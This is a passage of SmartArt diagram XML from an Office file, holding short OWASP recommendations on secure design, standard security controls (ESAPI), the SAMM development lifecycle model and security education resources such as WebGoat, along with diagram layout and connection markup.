          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>OWASP Developer’s Guide</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>, as a good starting point for guidance on how to design security in from the beginning.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9DFD859-7C28-4046-AE98-F24823BD2FCA}" type="parTrans" cxnId="{EAA6F69C-B5ED-43A6-B7AF-84BF5CD6BBEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC2A79BE-AD63-4ED9-B55E-16C3C2F46D7D}" type="sibTrans" cxnId="{EAA6F69C-B5ED-43A6-B7AF-84BF5CD6BBEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Standard Security Controls</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78BDE72E-320A-45A2-9C00-71C161400527}" type="parTrans" cxnId="{A9C19672-C679-460C-9FE3-F6008C0FDA2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48C4FD2A-4FFD-49E2-8C3B-E8FB5C35EE2E}" type="sibTrans" cxnId="{A9C19672-C679-460C-9FE3-F6008C0FDA2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9B37935-A190-492F-89CA-C506985D7367}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Building strong and usable security controls is exceptionally difficult. Providing developers with a set of standard security controls radically simplifies the development of secure applications. OWASP recommends the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>OWASP Enterprise Security API (ESAPI) project</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t> as a model for the security APIs needed to produce secure web applications. ESAPI provides reference implementations in </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Java</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>.NET</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>PHP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Classic ASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Python</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Cold Fusion</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF94F857-8D0F-453F-9A65-525077F420EA}" type="parTrans" cxnId="{CCBBEF0D-7BB3-44EA-BD95-BCAEB8FA6D24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07F02B5F-B548-4258-8893-06A8F8803A6E}" type="sibTrans" cxnId="{CCBBEF0D-7BB3-44EA-BD95-BCAEB8FA6D24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Secure Development Lifecycle</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{671B8E39-0FE0-4EFE-ADB5-69CAB59A0932}" type="parTrans" cxnId="{820E1E9E-430D-44C7-9220-3F902A5D2586}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EF82AA8-8580-4CBB-94BB-7D5D0BEBEECC}" type="sibTrans" cxnId="{820E1E9E-430D-44C7-9220-3F902A5D2586}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41C02D83-CEEC-4620-A615-8B5A4D00B738}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>To improve the process your organization follows when building such applications, OWASP recommends the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B8401E1-D1AE-4822-A27B-6C7F36490558}" type="parTrans" cxnId="{F7B73C40-DD58-41F7-94EB-D126F6E5D054}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{963C0D22-4492-41AE-A9A3-1E59F83BC07A}" type="sibTrans" cxnId="{F7B73C40-DD58-41F7-94EB-D126F6E5D054}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Application Security Education</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39506D7C-E801-4EF1-B6DE-EE6CE2183B0C}" type="parTrans" cxnId="{B9B967EE-9801-4D73-AD1E-74E3D6EEE0D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0CC77F7-8370-4C79-B175-E8006AF5A824}" type="sibTrans" cxnId="{B9B967EE-9801-4D73-AD1E-74E3D6EEE0D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0527E629-D6A1-4D08-92A0-442047772A1B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>The </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>OWASP Education Project</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t> provides training materials to help educate developers on web application security and has compiled a large list of </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>OWASP Educational Presentations</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. For hands-on learning about vulnerabilities, try </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>OWASP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>WebGoat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. To stay current, come to an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>OWASP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>AppSec</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t> Conference</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, OWASP Conference Training, or local </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>OWASP Chapter meetings</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE30B842-5C00-46E7-924F-4ED4BCAC119F}" type="parTrans" cxnId="{5BCE37A6-D490-402E-BED7-B266D56B4D42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61BE0B0A-057E-4602-B5F4-5CE5CF26BCAA}" type="sibTrans" cxnId="{5BCE37A6-D490-402E-BED7-B266D56B4D42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>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80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EA798A97-C42B-452A-B443-1F8731C07995}" type="pres">
      <dgm:prSet presAssocID="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}" type="pres">
      <dgm:prSet presAssocID="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}" type="pres">
      <dgm:prSet presAssocID="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F8CEA5E-4B37-490B-9AE0-CDA5F17BE6F0}" type="pres">
      <dgm:prSet presAssocID="{C6F93B38-475D-4104-A89D-89CE58E7B1DF}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" type="pres">
      <dgm:prSet presAssocID="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}" type="pres">
      <dgm:prSet presAssocID="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}" type="pres">
      <dgm:prSet presAssocID="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD358220-5785-4B23-978F-F4E2C7042D8B}" type="pres">
      <dgm:prSet presAssocID="{48C4FD2A-4FFD-49E2-8C3B-E8FB5C35EE2E}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" type="pres">
      <dgm:prSet presAssocID="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}" type="pres">
      <dgm:prSet presAssocID="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}" type="pres">
      <dgm:prSet presAssocID="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBFB702B-7982-4C7E-A93C-B997F1F67BF5}" type="pres">
      <dgm:prSet presAssocID="{5EF82AA8-8580-4CBB-94BB-7D5D0BEBEECC}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" type="pres">
      <dgm:prSet presAssocID="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{573CF2CD-94C3-4404-8E22-47B8390B5477}" type="pres">
      <dgm:prSet presAssocID="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="29803">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}" type="pres">
      <dgm:prSet presAssocID="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CCBBEF0D-7BB3-44EA-BD95-BCAEB8FA6D24}" srcId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" destId="{E9B37935-A190-492F-89CA-C506985D7367}" srcOrd="0" destOrd="0" parTransId="{DF94F857-8D0F-453F-9A65-525077F420EA}" sibTransId="{07F02B5F-B548-4258-8893-06A8F8803A6E}"/>
    <dgm:cxn modelId="{2E3C2C6F-6EA9-4C2E-855B-5264301F1B74}" type="presOf" srcId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" destId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{820E1E9E-430D-44C7-9220-3F902A5D2586}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" srcOrd="3" destOrd="0" parTransId="{671B8E39-0FE0-4EFE-ADB5-69CAB59A0932}" sibTransId="{5EF82AA8-8580-4CBB-94BB-7D5D0BEBEECC}"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{425B3E0E-6784-4328-A998-F95618C71FDA}" type="presOf" srcId="{39F11DF5-92F1-4803-9176-8CE41A00F711}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EAA6F69C-B5ED-43A6-B7AF-84BF5CD6BBEC}" srcId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" destId="{35005AD2-355F-4221-AFBE-62EE5EE8EED6}" srcOrd="0" destOrd="0" parTransId="{C9DFD859-7C28-4046-AE98-F24823BD2FCA}" sibTransId="{DC2A79BE-AD63-4ED9-B55E-16C3C2F46D7D}"/>
    <dgm:cxn modelId="{B9B967EE-9801-4D73-AD1E-74E3D6EEE0D5}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" srcOrd="4" destOrd="0" parTransId="{39506D7C-E801-4EF1-B6DE-EE6CE2183B0C}" sibTransId="{B0CC77F7-8370-4C79-B175-E8006AF5A824}"/>
    <dgm:cxn modelId="{B16D08DD-2EFE-497C-B032-364F10EAC766}" type="presOf" srcId="{41C02D83-CEEC-4620-A615-8B5A4D00B738}" destId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E93EE5B9-E4D2-4E36-AA66-7D0B8F662E3E}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
